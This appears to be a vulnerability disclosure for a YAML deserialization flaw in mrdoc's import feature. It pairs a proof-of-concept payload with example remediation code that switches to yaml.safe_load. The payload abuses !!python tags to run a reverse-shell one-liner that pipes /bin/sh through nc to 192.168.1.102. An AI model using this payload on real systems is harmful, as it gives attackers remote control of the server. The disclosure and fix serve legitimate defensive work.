Deserialization of Untrusted Data in zmister2016/mrdoc
Valid
Reported on
Aug 29th 2021
✍️ Description
mrdoc is an online document system developed in Python. It is suitable for individuals and small teams to manage documents, wikis, knowledge and notes, similar to GitBook. This package is vulnerable to RCE due to the use of yaml.load in the import function.
🕵️‍♂️ Proof of Concept

Uploaded ZIP:

Payload.yaml:
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.102 8090 >/tmp/f')"
💥 Impact
This vulnerability can lead to remote code execution (RCE).
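The usual remediation for this class of bug, shown as an added example that is not mrdoc's own code: parse YAML taken from an uploaded ZIP with PyYAML's `yaml.safe_load`, which builds only standard YAML types and raises on the `!!python/...` tags the payload relies on. The names `read_import_yaml`, `ImportRejected`, `build_zip`, the size cap and the sample file contents are assumptions made for the illustration.

```python
import io
import zipfile

import yaml  # PyYAML

MAX_YAML_BYTES = 1024 * 1024  # assumed cap on a member's declared size


class ImportRejected(Exception):
    """The uploaded archive contains YAML that is not plain data."""


def read_import_yaml(zip_bytes):
    """Parse each YAML member of an uploaded ZIP; return {name: data}."""
    parsed = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for info in archive.infolist():
            if not info.filename.lower().endswith((".yaml", ".yml")):
                continue
            if info.file_size > MAX_YAML_BYTES:
                raise ImportRejected(f"{info.filename}: YAML member too large")
            try:
                text = archive.read(info).decode("utf-8")
                # safe_load has no constructor for python/* tags, so a tagged
                # document fails with ConstructorError instead of being built.
                parsed[info.filename] = yaml.safe_load(text)
            except (UnicodeDecodeError, yaml.YAMLError) as exc:
                raise ImportRejected(f"{info.filename}: {exc}") from exc
    return parsed


def build_zip(members):
    """Build an in-memory ZIP from {name: text} for the constructed samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        for name, text in members.items():
            archive.writestr(name, text)
    return buf.getvalue()


# Constructed samples: a plain-data file, and a file carrying the same tags as
# the report's Payload.yaml with a harmless string in place of the command.
BENIGN_ZIP = build_zip({"project.yaml": "project_name: demo\ntoc:\n  - intro.md\n"})
TAGGED_ZIP = build_zip({"Payload.yaml": (
    "!!python/object/new:type\n"
    'args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]\n'
    'listitems: "pass"\n'
)})
```

Rejecting the whole archive on the first bad member, rather than skipping it, keeps a partially imported project from being created.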
Occurrences